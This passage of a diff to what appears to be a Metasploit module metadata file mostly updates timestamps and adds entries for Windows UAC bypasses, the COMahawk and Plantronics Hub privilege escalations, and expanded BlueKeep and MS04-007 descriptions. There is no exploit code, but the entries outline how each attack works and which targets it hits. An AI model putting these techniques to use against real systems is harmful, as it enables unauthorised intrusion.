+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/hhw_hhp_contentfile_bof",
@@ -108476,7 +109353,7 @@
    "targets": [
      "Windows XP English SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/hhw_hhp_indexfile_bof",
@@ -108738,7 +109615,7 @@
      "IDEAL Migration <= 4.5.1 on Windows XP",
      "IDEAL Administration <= 10.5 on Windows XP"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ideal_migration_ipj",
@@ -109080,7 +109957,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot",
@@ -109122,7 +109999,7 @@
    "targets": [
      "Internet Explorer"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mcafee_showreport_exec",
@@ -109207,7 +110084,7 @@
      "Windows XP SP3 - English",
      "Windows XP SP2 - English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mediajukebox.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mediajukebox",
@@ -109248,7 +110125,7 @@
    "targets": [
      "Windows XP SP3 / Vista / 7"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/microp_mppl.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/microp_mppl",
@@ -109333,7 +110210,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/millenium_mp3_pls",
@@ -109377,7 +110254,7 @@
    "targets": [
      "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30"
    ],
-    "mod_time": "2018-07-09 13:22:08 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mini_stream_pls_bof",
@@ -109500,7 +110377,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/moxa_mediadbplayback",
@@ -109584,7 +110461,7 @@
    "targets": [
      "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mplayer_sami_bof",
@@ -109633,7 +110510,7 @@
      "Microsoft Office 2007 SP2 English on Windows XP SP3 English",
      "Crash Target for Debugging"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms09_067_excel_featheader",
@@ -109680,7 +110557,7 @@
      "Microsoft PowerPoint Viewer 2003 (kb969615)",
      "Crash Target for Debugging"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms10_004_textbytesatom",
@@ -109726,7 +110603,7 @@
      "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3",
      "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms10_038_excel_obj_bof",
@@ -109871,7 +110748,7 @@
      "Microsoft Office Excel 2007 on Windows XP",
      "Microsoft Office Excel 2007 SP2 on Windows XP"
    ],
-    "mod_time": "2017-09-22 18:49:09 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms11_021_xlb_bof",
@@ -110104,7 +110981,7 @@
    "targets": [
      "Windows 7 SP1 / Office 2010 SP2 / Office 2013"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-10 09:53:13 +0000",
    "path": "/modules/exploits/windows/fileformat/ms14_060_sandworm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms14_060_sandworm",
@@ -110112,6 +110989,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "sandworm"
+      ]
    },
    "needs_cleanup": null
  },
@@ -110316,7 +111196,7 @@
    "targets": [
      "Windows XP SP2 English"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ms_visual_basic_vbp",
@@ -110400,7 +111280,7 @@
    "targets": [
      "Windows XP SP2-SP3 IE 7.0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/msworks_wkspictureinterface",
@@ -110443,7 +111323,7 @@
      "Windows Universal (SEH)",
      "Windows XP SP3 French"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/mymp3player_m3u",
@@ -110483,7 +111363,7 @@
    "targets": [
      "Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/netop.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/netop",
@@ -110865,7 +111745,7 @@
    "targets": [
      "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/openoffice_ole.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/openoffice_ole",
@@ -111037,7 +111917,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/proshow_cellimage_bof",
@@ -111297,7 +112177,7 @@
      "WinSrv 2000 SP2 English",
      "WinSrv 2003 Enterprise Edition SP1 (v1023) English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/safenet_softremote_groupname",
@@ -111338,7 +112218,7 @@
    "targets": [
      "Windows XP SP3 / IE 7"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/sascam_get.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/sascam_get",
@@ -111423,7 +112303,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/shadow_stream_recorder_bof",
@@ -111504,7 +112384,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/somplplayer_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/somplplayer_m3u",
@@ -111586,7 +112466,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2018-01-23 16:34:49 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/syncbreeze_xml.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/syncbreeze_xml",
@@ -111846,7 +112726,7 @@
    "targets": [
      "Windows XP SP0"
    ],
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/ursoft_w32dasm.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ursoft_w32dasm",
@@ -111890,7 +112770,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/varicad_dwb.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/varicad_dwb",
@@ -112063,7 +112943,7 @@
      "Visio 2002 English on Windows XP SP3 Spanish",
      "Visio 2002 English on Windows XP SP3 English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/visio_dxf_bof",
@@ -112362,7 +113242,7 @@
    "targets": [
      "VUPlayer 2.49"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vuplayer_cue",
@@ -112402,7 +113282,7 @@
    "targets": [
      "VUPlayer 2.49"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vuplayer_m3u",
@@ -112710,7 +113590,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/wm_downloader_m3u",
@@ -112753,7 +113633,7 @@
    "targets": [
      "Windows XP SP2 / SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/xenorate_xpl_bof",
@@ -112840,7 +113720,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/xradio_xrl_sehbof",
@@ -115132,7 +116012,7 @@
    "targets": [
      "Windows XP SP3 / Windows Vista"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/ftp/scriptftp_list.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/scriptftp_list",
@@ -117933,7 +118813,7 @@
      "Efmws 5.3 Universal",
      "Efmws 4.0 Universal"
    ],
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-01-05 21:39:34 +0000",
    "path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/efs_fmws_userid_bof",
@@ -126393,6 +127273,51 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/local/bypassuac_dotnet_profiler": {
+    "name": "Windows Escalate UAC Protection Bypass (Via dot net profiler)",
+    "fullname": "exploit/windows/local/bypassuac_dotnet_profiler",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2017-03-17",
+    "type": "exploit",
+    "author": [
+      "Casey Smith",
+      "\"Stefan Kanthak\" <stefan.kanthak () nexgo de>",
+      "bwatters-r7"
+    ],
+    "description": "Microsoft Windows allows for the automatic loading of a profiling COM object during\n      the launch of a CLR process based on certain environment variables ostensibly to\n      monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL\n      that will be launched as the profiling thread.  This thread will run at the permission\n      level of the calling process, so an auto-elevating process will launch the DLL with\n      elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR\n      process, but others would work, too.",
+    "references": [
+      "URL-https://seclists.org/fulldisclosure/2017/Jul/11",
+      "URL-https://offsec.provadys.com/UAC-bypass-dotnet.html"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-11-18 12:57:33 +0000",
+    "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/bypassuac_dotnet_profiler",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/bypassuac_eventvwr": {
    "name": "Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)",
    "fullname": "exploit/windows/local/bypassuac_eventvwr",
@@ -126565,6 +127490,52 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/local/bypassuac_sdclt": {
+    "name": "Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)",
+    "fullname": "exploit/windows/local/bypassuac_sdclt",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2017-03-17",
+    "type": "exploit",
+    "author": [
+      "enigma0x3",
+      "bwatters-r7"
+    ],
+    "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n        the current user hive, and inserting a custom command that will get invoked when\n        Window backup and restore is launched. It will spawn a second shell that has the UAC\n        flag turned off.\n\n        This module modifies a registry key, but cleans up the key once the payload has\n        been invoked.",
+    "references": [
+      "URL-https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
+      "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1",
+      "URL-https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-11-18 01:45:57 +0000",
+    "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/bypassuac_sdclt",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/bypassuac_silentcleanup": {
    "name": "Windows Escalate UAC Protection Bypass (Via SilentCleanup)",
    "fullname": "exploit/windows/local/bypassuac_silentcleanup",
@@ -126600,7 +127571,7 @@
    "targets": [
      "Microsoft Windows"
    ],
-    "mod_time": "2019-07-02 12:36:07 +0000",
+    "mod_time": "2019-12-05 15:08:50 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_silentcleanup.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_silentcleanup",
@@ -126828,6 +127799,52 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/comahawk": {
+    "name": "Microsoft UPnP Local Privilege Elevation Vulnerability",
+    "fullname": "exploit/windows/local/comahawk",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-12",
+    "type": "exploit",
+    "author": [
+      "NCC Group",
+      "hoangprod",
+      "bwatters-r7"
+    ],
+    "description": "This exploit uses two vulnerabilities to execute a command as an elevated user.\n      The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n      NT AUTHORITY\\LOCAL SERVICE\n      The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n      elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "CVE-2019-1322",
+      "CVE-2019-1405",
+      "EDB-47684",
+      "URL-https://github.com/apt69/COMahawk",
+      "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/",
+      "URL-https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-12-18 14:33:13 +0000",
+    "path": "/modules/exploits/windows/local/comahawk.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/comahawk",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/local/current_user_psexec": {
    "name": "PsExec via Current User Token",
    "fullname": "exploit/windows/local/current_user_psexec",
@@ -127135,7 +128152,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2018-07-27 11:35:31 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/mov_ss.rb",
    "is_install_path": true,
    "ref_name": "windows/local/mov_ss",
@@ -127865,7 +128882,7 @@
    "targets": [
      "Windows 7 SP1"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/ms16_016_webdav.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ms16_016_webdav",
@@ -128363,7 +129380,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2019-10-27 11:25:56 +0000",
+    "mod_time": "2019-12-12 15:20:51 +0000",
    "path": "/modules/exploits/windows/local/payload_inject.rb",
    "is_install_path": true,
    "ref_name": "windows/local/payload_inject",
@@ -128403,7 +129420,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence",
@@ -128444,7 +129461,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-10-02 14:50:00 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence_image_exec_options",
@@ -128483,7 +129500,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2019-05-31 17:44:35 +0000",
+    "mod_time": "2019-11-16 04:57:18 +0000",
    "path": "/modules/exploits/windows/local/persistence_service.rb",
    "is_install_path": true,
    "ref_name": "windows/local/persistence_service",
@@ -128494,6 +129511,54 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/plantronics_hub_spokesupdateservice_privesc": {
+    "name": "Plantronics Hub SpokesUpdateService Privilege Escalation",
+    "fullname": "exploit/windows/local/plantronics_hub_spokesupdateservice_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-30",
+    "type": "exploit",
+    "author": [
+      "Markus Krell",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "The Plantronics Hub client application for Windows makes use of an\n        automatic update service `SpokesUpdateService.exe` which automatically\n        executes a file specified in the `MajorUpgrade.config` configuration\n        file as SYSTEM. The configuration file is writable by all users by default.\n\n        This module has been tested successfully on Plantronics Hub version 3.13.2\n        on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2019-15742",
+      "EDB-47845",
+      "URL-https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-01-03 20:32:01 +0000",
+    "path": "/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/plantronics_hub_spokesupdateservice_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/powershell_cmd_upgrade": {
    "name": "Windows Command Shell Upgrade (Powershell)",
    "fullname": "exploit/windows/local/powershell_cmd_upgrade",
@@ -128818,7 +129883,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-03-29 18:14:56 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/registry_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/registry_persistence",
@@ -129226,7 +130291,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/local/wmi_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/wmi_persistence",
@@ -134818,7 +135883,7 @@
    "targets": [
      "MySQL on Windows"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
    "is_install_path": true,
    "ref_name": "windows/mysql/mysql_start_up",
@@ -136035,7 +137100,7 @@
      "OJ Reeves <oj@beyondbinary.io>",
      "Brent Cook <bcook@rapid7.com>"
    ],
-    "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n        allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n        the freed channel is used to achieve arbitrary code execution.",
+    "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n        allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n        the freed channel is used to achieve arbitrary code execution.\n\n        Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n        Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n        selection is correctly matched to the system's memory layout.\n\n        HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n        *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n        This is a non-standard configuration for normal servers, and the target will crash if\n        the aforementioned Registry key is not set!\n\n        If the target is crashing regardless, you will likely need to determine the non-paged\n        pool base in kernel memory and set it as the GROOMBASE option.",
    "references": [
      "CVE-2019-0708",
      "URL-https://github.com/zerosum0x0/CVE-2019-0708",
@@ -136060,7 +137125,7 @@
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)",
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)"
    ],
-    "mod_time": "2019-11-11 17:33:10 +0000",
+    "mod_time": "2020-01-12 08:19:44 +0000",
    "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -136348,7 +137413,7 @@
      "CoDeSys v2.3 on Windows XP SP3",
      "CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/windows/scada/codesys_web_server.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/codesys_web_server",
@@ -137763,7 +138828,7 @@
      "Execute payload",
      "Neutralize implant"
    ],
-    "mod_time": "2019-11-13 02:10:03 +0000",
+    "mod_time": "2020-01-22 16:37:36 +0000",
    "path": "/modules/exploits/windows/smb/doublepulsar_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/doublepulsar_rce",
@@ -137858,7 +138923,7 @@
      "Windows x86",
      "Windows x64"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 09:41:08 +0000",
    "path": "/modules/exploits/windows/smb/group_policy_startup.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/group_policy_startup",
@@ -137866,6 +138931,9 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "badsamba"
+      ]
    },
    "needs_cleanup": null
  },
@@ -137971,7 +139039,7 @@
    "author": [
      "Solar Eclipse <solareclipse@phreedom.org>"
    ],
-    "description": "This is an exploit for a previously undisclosed\n        vulnerability in the bit string decoding code in the\n        Microsoft ASN.1 library. This vulnerability is not related\n        to the bit string vulnerability described in eEye advisory\n        AD20040210-2. Both vulnerabilities were fixed in the\n        MS04-007 patch.\n\n        You are only allowed one attempt with this vulnerability. If\n        the payload fails to execute, the LSASS system service will\n        crash and the target system will automatically reboot itself\n        in 60 seconds. If the payload succeeds, the system will no\n        longer be able to process authentication requests, denying\n        all attempts to login through SMB or at the console. A\n        reboot is required to restore proper functioning of an\n        exploited system.\n\n        This exploit has been successfully tested with the win32/*/reverse_tcp\n        payloads, however a few problems were encountered when using the\n        equivalent bind payloads. Your mileage may vary.",
+    "description": "This is an exploit for a previously undisclosed\n        vulnerability in the bit string decoding code in the\n        Microsoft ASN.1 library. This vulnerability is not related\n        to the bit string vulnerability described in eEye advisory\n        AD20040210-2. Both vulnerabilities were fixed in the\n        MS04-007 patch.  Windows 2000 SP4 Rollup 1 also patches this\n        vulnerability.\n\n        You are only allowed one attempt with this vulnerability. If\n        the payload fails to execute, the LSASS system service will\n        crash and the target system will automatically reboot itself\n        in 60 seconds. If the payload succeeds, the system will no\n        longer be able to process authentication requests, denying\n        all attempts to login through SMB or at the console. A\n        reboot is required to restore proper functioning of an\n        exploited system.\n\n        This exploit has been successfully tested with the win32/*/reverse_tcp\n        payloads, however a few problems were encountered when using the\n        equivalent bind payloads. Your mileage may vary.",
    "references": [
      "CVE-2003-0818",
      "OSVDB-3902",
@@ -137992,7 +139060,7 @@
    "targets": [
      "Windows 2000 SP2-SP4 + Windows XP SP0-SP1"
    ],
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2019-12-03 20:22:05 +0000",
    "path": "/modules/exploits/windows/smb/ms04_007_killbill.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms04_007_killbill",
@@ -138000,6 +139068,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "kill-bill"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-restarts",
+        "crash-service-down"
+      ]
    },
    "needs_cleanup": null
  },
@@ -138277,7 +139355,7 @@
      "(stack)  Windows XP SP1 Italian",
      "(wcscpy) Windows 2003 SP0"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-03 06:32:02 +0000",
    "path": "/modules/exploits/windows/smb/ms06_040_netapi.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms06_040_netapi",
@@ -138285,6 +139363,13 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-restarts",
+        "crash-service-down"
+      ]
    },
    "needs_cleanup": null
  },
@@ -138812,7 +139897,7 @@
    "targets": [
      "Windows 7 and Server 2008 R2 (x64) All Service Packs"
    ],
